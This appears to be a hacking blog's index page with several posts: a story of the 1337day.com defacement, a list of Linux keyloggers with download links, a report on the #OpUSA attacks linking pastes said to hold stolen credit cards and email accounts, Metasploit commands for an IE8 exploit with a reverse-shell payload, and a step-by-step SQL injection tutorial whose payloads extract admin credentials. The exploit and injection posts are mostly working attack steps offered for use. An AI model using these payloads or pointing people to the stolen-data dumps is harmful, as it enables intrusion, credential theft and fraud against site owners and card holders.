href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtpgVFrvPxj0o_t3AoMQpThrZnTZ8pxwx_Um16qTewWV3BYVkutbFAphjjSoaL7vvWUsGhyphenhyphenvf5j6AC83XOpxvVpv5BOWLJ2ETAgi7ihGCXErdKMD5kz3UiSwIRS3NSPOxuSy_-H_Euaf0/s1600/Untitled.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="342" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtpgVFrvPxj0o_t3AoMQpThrZnTZ8pxwx_Um16qTewWV3BYVkutbFAphjjSoaL7vvWUsGhyphenhyphenvf5j6AC83XOpxvVpv5BOWLJ2ETAgi7ihGCXErdKMD5kz3UiSwIRS3NSPOxuSy_-H_Euaf0/s640/Untitled.png" width="577" /></a></div><br />By looking at the author name <b>"Agd_Scorp"</b>, i understood the whole point of the dispute, <b>Agd_Scorp </b>is a well known hacker and founding member of "Turkguvenligi", He is responsible for lots of high profile defacements, If you take a look at his Zone-h record, it's pretty impressive, he has history of hacking into domain registrars.<br /><br />It appears to me that some known was submitting exploits with the name of Agd_Scorp, They asked 1337day team to remove it, however they refused to remove it. Therefore they defaced their website.<br /><b><br /></b><b>How was 1337day.com hacked?</b><br /><b><br /></b>There have been issues in the past where 1337day, injectors etc and their mirror websites were hacked, but in all of those cases, their servers were never compromised, it was their domain registrar Moniker.com, which got compromised by the attackers.<br /><br />The attackers, compromised moniker.com and changed their dns servers to their own dns servers, a story matching <a href="http://www.rafayhackingarticles.net/2012/11/how-google-pakistan-was-hacked.html" target="_blank">Google Pakistan hack</a>, The 1337day team later confirmed on their facebook that their domain registrar was the victim of their attack not their DNS servers.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiah_1cYQFRV-cMEcGCOCkuyUr8QivCaBdhKtJDeVoISHhDnI__9u2v871RS41Pt1lu6kK1jE0MRERl-z4OjRe2FSJ-75kpp_hkL8w1m09AvnMMMc0YGL06Z1hHHGB0hz0cdWM2zX94P0U/s1600/1337.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="242" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiah_1cYQFRV-cMEcGCOCkuyUr8QivCaBdhKtJDeVoISHhDnI__9u2v871RS41Pt1lu6kK1jE0MRERl-z4OjRe2FSJ-75kpp_hkL8w1m09AvnMMMc0YGL06Z1hHHGB0hz0cdWM2zX94P0U/s640/1337.png" width="577" /></a></div>They have also asked webmasters not to invent stories that their server was hacked. They say it's impossible, I don't agree with them on this point. Even most secure systems can be compromised.<br /><br />On performing a WHOIS lookup, I came to know that they have actually switched their hosting account from Moniker.com to hostgator.com<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1WwNUsA6J0rWuQaqCs16jxAAvdKU44Tu-F5gyeFxC0i8-q3QLq6YCVlW69xl-YGKEgrPjletmkjFUoXahjdKNQ2FJq4RO9m4fG_VVkBzpBMPh4iE04c9Ji12lv6qGm9EpgDNSvaB_0f4/s1600/Untitled11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="274" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1WwNUsA6J0rWuQaqCs16jxAAvdKU44Tu-F5gyeFxC0i8-q3QLq6YCVlW69xl-YGKEgrPjletmkjFUoXahjdKNQ2FJq4RO9m4fG_VVkBzpBMPh4iE04c9Ji12lv6qGm9EpgDNSvaB_0f4/s640/Untitled11.png" width="577" /></a></div><br />I have confirmed with hostgator that the dns servers for websitewelcome belong to them. We, will update you as soon as we have more information. </div>

How Was 1337day.com Hacked?

Today, in the morning when i browsed to 1337day.com (The famous exploit buying/selling database), I was shocked to see 1337day defaced by f...

+ Read more »

List of Linux Key loggers

<div dir="ltr" style="text-align: left;" trbidi="on"><style type="text/css">P { margin-bottom: 0.08in; }A:link { }</style><span style="font-size: medium;">(1)LKL:-</span><br /><div style="margin-bottom: 0in;"><span style="font-size: medium;">LKL is a user space keylogger that runs under linux--x86/arch. LKL sniffs and logs everything passes trought the hardware keyboard port (0x60).</span></div><div style="margin-bottom: 0in;"><br /></div><div style="margin-bottom: 0in;"><span style="font-size: medium;">Download From <a href="http://kaz.dl.sourceforge.net/project/lkl/lkl-0.1.1/lkl-0.1.1/lkl-0.1.1.tar.gz">here</a></span></div><div style="margin-bottom: 0in;"><br /></div><div style="margin-bottom: 0in;"><span style="font-size: medium;">(2)Log Key:- </span></div><div style="margin-bottom: 0in;"><span style="font-size: medium;">logkeys is a linux keylogger. It is no more advanced than other available linux</span></div><div style="margin-bottom: 0in;"><span style="font-size: medium;">keyloggers, notably lkl and uberkey, but is a bit newer, more up to date, it doesn't unreliably repeat keys and it shouldn't crash your X. All in all, it just seems to work. It relies on event interface of the Linux input subsystem. </span></div><div style="margin-bottom: 0in;"><br /></div><div style="margin-bottom: 0in;"><span style="font-size: medium;">Once completely set, it logs all common character and function keys, while also</span></div><div style="margin-bottom: 0in;"><span style="font-size: medium;">being fully aware of Shift and Altr key modifiers.</span></div><div style="margin-bottom: 0in;"><br /></div><div style="margin-bottom: 0in;"><span style="font-size: medium;">Download from <a href="http://logkeys.googlecode.com/files/logkeys-0.1.1a.tar.gz">here</a></span></div><div style="margin-bottom: 0in;"><br /></div><div style="margin-bottom: 0in;"><span style="font-size: medium;">(3)Ttypld:-</span></div><div style="margin-bottom: 0in;"><span style="font-size: medium;">ttyrpld is a kit to log any traffic and actions which go through any of your Kernel's tty </span></div><div style="margin-bottom: 0in;"><span style="font-size: medium;">devices. In common-term language, this is a Keylogger</span></div><div style="margin-bottom: 0in;"><br /></div><div style="margin-bottom: 0in;"><span style="font-size: medium;">Download from <a href="http://kaz.dl.sourceforge.net/project/ttyrpld/ttyrpld/2.60/ttyrpld-2.60.tar.bz2">here</a></span></div><div style="margin-bottom: 0in;"><br /></div><div style="margin-bottom: 0in;"><span style="font-size: medium;">(4)uber key :-</span></div><div style="margin-bottom: 0in;"><span style="font-size: medium;">Download <a href="ftp://ftp.nz.debian.org/freebsd/ports/distfiles/uberkey-1.2.tar.gz">link</a></span></div><div style="margin-bottom: 0in;"><br /></div><div style="margin-bottom: 0in;"><span style="font-size: medium;">(5)Vlogger:-</span></div><div style="margin-bottom: 0in;"><span style="font-size: medium;">Download <a href="http://www.thc.org/releases/vlogger-2.1.1.tar.gz">link</a></span></div><div style="margin-bottom: 0in;"><br /></div><div style="margin-bottom: 0in;"><span style="font-size: medium;">(6)Simple keylogger Python script:-</span></div><div style="margin-bottom: 0in;"><span style="font-size: medium;">Download <a href="http://kaz.dl.sourceforge.net/project/linuxkeylogger/keylogger.py">here</a></span></div><div style="margin-bottom: 0in;"><br /></div><div style="margin-bottom: 0in;"><span style="font-size: medium;">If you are free & want to learn how keyboard driver works in linux kernal , I would recommended you to read from following link .</span></div><div style="margin-bottom: 0in;"><a href="http://thc.org/papers/writing-linux-kernel-keylogger.txt"><span style="font-size: medium;">http://thc.org/papers/writing-linux-kernel-keylogger.txt</span></a></div><div style="margin-bottom: 0in;"><br /></div><div style="margin-bottom: 0in;"><span style="font-size: medium;">Also read this article which is quite </span><span style="font-size: medium;"><i><b> </b></i></span><span style="font-size: medium;"><span style="font-style: normal;"><span style="font-weight: normal;">interesting.</span></span></span><span style="font-size: medium;"><i><b></b></i><b>http://theinvisiblethings.blogspot.in/2011/04/linux-security-circus-on-gui-isolation.html</b></span></div><a name="more"></a><br /></div>

List of Linux Key loggers

(1)LKL:- LKL is a user space keylogger that runs under linux--x86/arch. LKL sniffs and logs everything passes trought the hardware keyboard ...

+ Read more »

Anonymous Hackers Cause Significant Damage To Banking And Government Agencies

<div dir="ltr" style="text-align: left;" trbidi="on"><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhD6KQgDHgFY6hLxCFWYJgK7JFHmA_CUvd4nICnhtC__pqSdOGn1PqozThpWG9I9lFzObuvEDIPD_0pxtjcUvWeP4hf1GID5Trkgw8miUaphUfi5t-TdkN0UxW5xakA9jVn3Mc7-AI4NU0/s1600/967d3a1e5869cae4490e28b80ae2d53c.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhD6KQgDHgFY6hLxCFWYJgK7JFHmA_CUvd4nICnhtC__pqSdOGn1PqozThpWG9I9lFzObuvEDIPD_0pxtjcUvWeP4hf1GID5Trkgw8miUaphUfi5t-TdkN0UxW5xakA9jVn3Mc7-AI4NU0/s1600/967d3a1e5869cae4490e28b80ae2d53c.jpeg" /></a></div><br />A collective of hacker groups planed to attack the websites of major government agencies and banks on May 7 to protest American foreign policy.<br /><br />For weeks, the groups, which include Anonymous, have used social media to publicize their planned operation, dubbed "#OpUSA."<br /><br /><a name="more"></a><br />Experts from USA(to cover up things) say that the attack was not well-planned and focused. On the other hand, twitter is full of #OpUSA tweets which tells us a different story. The hacker groups have compromised a large number of targets which as either owned by US government or its residents.<br /><br />AnonGhost made a significant contribution to #OpUSA by taking down a large number of websites, emails, credit cards, etc. According to their pastebin post, hackers claim to hack-<br /><b><i><br /></i></b><b><i>- More than 700 websites (http://pastebin.com/zftTrrrh)</i></b><br /><b><i>- More than 10k American credit cards(http://pastebin.com/D4QCynHC)</i></b><br /><b><i>- 1 lac email accounts which belong to US residents (http://www45.zippyshare.com/v/58998013/file.html) 4. - More than 5000 facebook accounts(http://pastebin.com/NRvmnYFe)</i></b><br /><b><i>- More than 12k email accounts of USA (http://www11.zippyshare.com/v/39103082/file.html)</i></b><br /><br />The complete paste can be seen here<b>(http://pastebin.com/RSqKCd1N).</b><br /><br />The list of hacked sites mostly include high profile government websites from Australia, Ministry of environment Dominica, government of Argentina, Philippines, NGOs,  universities and other educational institutions from Thailand  Brazil, Russia, Israel, USA, Canada, UK, Romania, and Italy.<br /><br />Most of the sites seem to be recovered but some of them are still now defaced, down or under maintenance.<br /><br />We managed to ask the leader of AnonOps "Mauritania Attacker", also responsible for lots of high profile defacements, the purpose and the cause of the #OPUSA.<br /><b><br /></b><b>"I attack USA because they think that muslims are terrorist but the reality is that they themselves are the biggest terrorist and they declared war Against Islam and me as a Muslim i will stand against them even if i die "</b> Mauritania Attacker said.<br /><br />Mauritania Attacker is the leader of AnonOPS, He played a major role inside #OPISRAEL, along with it he is also responsible for other high profile attacks on lots of other organizations.<br /><b><i><br /></i></b><b><i>Note: RHA has no association with any of the hacktivists. </i></b><br /><b><br /></b><b>About The Author</b><br /><b><br /></b>Major Part of this article was contributed by a security researcher Deepanker Arora. Recently, He contributed an article on "<b><a href="http://www.rafayhackingarticles.net/2013/04/hacking-windows-servers-privilege.html" target="_blank">Hacking Windows Servers</a></b>".<br /></div>

Anonymous Hackers Cause Significant Damage To Banking And Government Agencies

A collective of hacker groups planed to attack the websites of major government agencies and banks on May 7 to protest American foreign poli...

+ Read more »

Exploit 0Day vulnerability in Internet Exploit 8

<div dir="ltr" style="text-align: left;" trbidi="on">Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability<br /><br />This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.<br /><br />Exploit Targets<br /><br />    0 - Automatic (default)<br />    1 - IE 8 on Windows XP SP3<br />    2 - IE 8 on Windows Vista<br />    3 - IE 8 on Windows Server 2003<br />    4 - IE 8 on Windows 7<br /><br />msf > use exploit/windows/browser/ie_cgenericelement_uaf<br />msf exploit(ie_cgenericelement_uaf) > show payloads<br />msf exploit(ie_cgenericelement_uaf) > set PAYLOAD windows/meterpreter/reverse_tcp<br />msf exploit(ie_cgenericelement_uaf) > set LHOST [MY IP ADDRESS]<br />msf exploit(ie_cgenericelement_uaf) > exploit<br /><br /><a name="more"></a></div>

Exploit 0Day vulnerability in Internet Exploit 8

Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability This module exploits a vulnerability found in Microsoft Inte...

+ Read more »

SQL Injection With Update Query

<div dir="ltr" style="text-align: left;" trbidi="on"><!-- This HTML code has been optimized by http://www.iwebtool.com/html_optimizer --> <br /><div dir="ltr" style="text-align: left;" trbidi="on"><span style="background-color: white; color: #333333; font-family: Verdana; font-size: 11.818181991577148px; line-height: 19.190340042114258px;">                             </span><img alt="SQL1.bmp" height="363" src="http://blog.mile2.com/wp-content/uploads/2012/03/SQL1.bmp" style="background-color: white; color: #333333; font-family: Verdana; font-size: 11.818181991577148px; line-height: 19.190340042114258px; padding: 10px;" width="400" /><br />We have wrote couple of articles discussing various techniques and attack vectors for SQL Injection, We have already discussed <b><a href="http://www.rafayhackingarticles.net/2013/02/sql-injection-basics-union-based.html" target="_blank">Basic SQL Injection With Union Based</a></b>, <b><a href="http://www.rafayhackingarticles.net/2013/02/blind-sql-injection-detection-and.html" target="_blank">Blind SQL Injection</a></b>, <b><a href="http://www.rafayhackingarticles.net/2013/03/mysql-injection-time-based.html" target="_blank">Time Based SQL Injection</a> </b>and also discussed<b> <a href="http://www.rafayhackingarticles.net/2013/02/solutions-related-to-sql-injection.html" target="_blank">common problems and their solutions related to SQL Injection</a></b>. However, this time <b>Daniel Max</b> a regular reader of RHA will discuss about exploiting SQL Injection with Update Query.<br /><a name="more"></a><br />Most of the tutorials, You see on the web usually explains to use the <b>SELECT </b>method in order to retrieve stuff from the database, But what if we wanted to update some thing that is already present in the database, <b>For example </b>a MD5 hash, that we are not able to crack, In order to gain access to the admin panel, We would simply run a update query and it will automatically update the password. We recommend you to atleast read little bit about MYSQL from w3schools.com, before proceeding with this tutorial as this tutorial is not for complete beginners.<br /><br /><b>Requirements</b><br /><ul><li><a href="https://addons.mozilla.org/En-us/firefox/addon/tamper-data/" rel="nofollow" target="_blank">Tamper Data</a></li><li><a href="http://portswigger.net/burp/" rel="nofollow" target="_blank">Burp Suite</a></li><li>Know how of MySQL <b>(w3schools.com recommended)</b></li></ul>So, Below is a screenshot of the form which we want to update, What we want to update is the Email address with our SQL Injection.<br /><a href="http://www.zaslike.com/files/gnjwupwgtr2tzjd0d0n7.jpg" style="margin-left: 1em; margin-right: 1em;" target="_blank"><img border="0" src="http://www.zaslike.com/files/gnjwupwgtr2tzjd0d0n7.jpg" /></a><br /><br />Vulnerable parameter is <b>"E-mail format: " </b>value.We would use<b> Tamper data </b>to intercept and change the values.<br /><br />Here is a screenshot:<br /><br /><a href="http://www.zaslike.com/files/glxns7kbo43dvgkxfx7.jpg" style="margin-left: 1em; margin-right: 1em;" target="_blank"><img border="0" height="496" src="http://i.imm.io/145na.jpeg" width="577" /></a><br /><br />After we click ok we get an error the following error:<br /><br /><div style="clear: both; text-align: center;"><a href="http://www.zaslike.com/files/uxjirugnl9o93hczvw7.jpg" style="margin-left: 1em; margin-right: 1em;" target="_blank"><img border="0" height="382" src="http://i.imm.io/145rM.jpeg" width="577" /></a></div><br />First we want to find the exact database version, but what would be the easiest way.<br /><br />We can set value for other parameters, MySQL will let us do that as long as that parameter is one of UPDATE query parameters. We will use <b>"fname" </b>, which is string value. Database query output will be shown inside <b>"First name" </b>input box (where it says<b> MaXoNe</b>).<br /><br />Screenshot of version query:<br /><br /><div style="clear: both; text-align: center;"><a href="http://www.zaslike.com/files/rq10im4pbxlq9z28njt.jpg" style="margin-left: 1em; margin-right: 1em;" target="_blank"><img border="0" height="498" src="http://i.imm.io/145sB.jpeg" width="577" /></a></div><br />Screenshot of the rendered content with database answer:<br /><br /><div style="clear: both; text-align: center;"><a href="http://www.zaslike.com/files/1fif52vla855ltbf8wp7.jpg" style="margin-left: 1em; margin-right: 1em;" target="_blank"><img border="0" height="577" src="http://www.zaslike.com/files/1fif52vla855ltbf8wp7.jpg" width="518" /></a></div><div style="clear: both; text-align: center;"><a href="http://www.zaslike.com/files/b9z4c7k624xoe4ll3ft.jpg" style="margin-left: 1em; margin-right: 1em;" target="_blank"><br /></a></div><div style="clear: both; text-align: center;"><a href="http://www.zaslike.com/files/81icqfwuctjcrb135mb7.jpg" style="margin-left: 1em; margin-right: 1em;" target="_blank"><br /></a></div><div style="clear: both; text-align: center;"><a href="http://www.zaslike.com/files/hbljoowgdmizjojyxg.jpg" style="margin-left: 1em; margin-right: 1em;" target="_blank"><br /></a></div><br />Now that we know how to create our query, lets get the tables.<br /><br /><b>Full query: <u>html' , fname = (select group_concat(table_name) from information_schema.tables where table_schema = database()) , phone =</u></b><u> '</u><br /><br /><b>Tables Query:</b><br /><br /><a href="http://www.zaslike.com/files/b9z4c7k624xoe4ll3ft.jpg" style="margin-left: 1em; margin-right: 1em;" target="_blank"><img border="0" height="496" src="http://i.imm.io/145tb.jpeg" width="577" /></a><br />Screenshot of the rendered content with database answer:<br /><br /><a href="http://www.zaslike.com/files/81icqfwuctjcrb135mb7.jpg" style="margin-left: 1em; margin-right: 1em;" target="_blank"><img border="0" height="577" src="http://www.zaslike.com/files/81icqfwuctjcrb135mb7.jpg" width="488" /></a><br /><br /><br />Three tables, strange !? Lets check that again.We use count.<br /><br /><b>Full query</b>:<b><u> html' , fname = (select count(table_name) from information_schema.tables where table_schema = database()) , phone = '</u></b><br /><br />Screenshot of <b>get tables count query</b>:<br /><br /><a href="http://www.zaslike.com/files/hbljoowgdmizjojyxg.jpg" style="margin-left: 1em; margin-right: 1em;" target="_blank"><img border="0" height="495" src="http://i.imm.io/145tA.jpeg" width="577" /></a><br /><br />Screenshot of the rendered content with database answer:<br /><br /><br /><div style="clear: both; text-align: center;"><a href="http://www.zaslike.com/files/mefsuuj1bsbysu3v3rrz.jpg" style="margin-left: 1em; margin-right: 1em;" target="_blank"><img border="0" height="640" src="http://www.zaslike.com/files/mefsuuj1bsbysu3v3rrz.jpg" width="506" /></a></div><br /><br />Now is time for Burp intruder.Set browser to use <b>127.0.0.1</b> and <b>8080</b> for all URLs.<br />We use Burp Suite intruder with '<b>Attack type</b>' "<b>Sniper</b>" and '<b>Payload type</b>' "<b>Numbers</b>"<br /><b><br /></b><b>Full query:</b> <b>html' , fname = (select concat(table_name) from information_schema.tables where table_schema = database() limit 0,1) , phone = '</b><br /><br />Screenshot of burp settings:<br /><br /><div style="clear: both; text-align: center;"><a href="http://www.zaslike.com/files/ngduvauza1sbcd4tin5.jpg" style="margin-left: 1em; margin-right: 1em;" target="_blank"><img border="0" height="386" src="http://www.zaslike.com/files/ngduvauza1sbcd4tin5.jpg" width="577" /></a></div><div style="clear: both; text-align: center;"><a href="http://www.zaslike.com/files/bgil7holekgp989ixtcj.jpg" style="margin-left: 1em; margin-right: 1em;" target="_blank"><img border="0" height="396" src="http://www.zaslike.com/files/bgil7holekgp989ixtcj.jpg" width="577" /></a></div><div style="clear: both; text-align: center;"><a href="http://www.zaslike.com/files/fim14pwqh7tnfxbml8.jpg" style="margin-left: 1em; margin-right: 1em;" target="_blank"><img border="0" height="427" src="http://www.zaslike.com/files/fim14pwqh7tnfxbml8.jpg" width="577" /></a></div><div style="clear: both; text-align: center;"><a href="http://www.zaslike.com/files/tif772tam8dmakbhyqu4.jpg" style="margin-left: 1em; margin-right: 1em;" target="_blank"><img border="0" height="382" src="http://www.zaslike.com/files/tif772tam8dmakbhyqu4.jpg" width="577" /></a></div><br /><br />Thats it. And now you just get columns the same way with Burp Suite.<br /><br />Full query: <b><u>html' , fname = (select concat(column_name) from information_schema.columns where table_name = 0x61646d696e73 limit n,1) , phone = '</u></b><br /><br />Just increment <b>n</b> with Burp Suite.<br /><br />Values :<br /><br /><b>Full query: <u>html' , fname = (select concat(user,0x3a,pass) from admins limit n,1) , phone = '</u></b><br /><br />Just increment<b> n</b> with Burp Suite.<br /><br />That's it , simple and yet effective . I used this because , waf blocke<b>d -- </b>and -<b>-+</b> so I wasn't able to close and comment out query.<br /><b><br /></b><b>About The Author</b><br /><b><br /></b>This article has been written by Daniel Max, He is a security researcher from Bosnia, He is willing to actively contribute to RHA. </div></div>

SQL Injection With Update Query

                              We have wrote couple of articles discussing various techniques and attack vectors for SQL Injection, We have ...

+ Read more »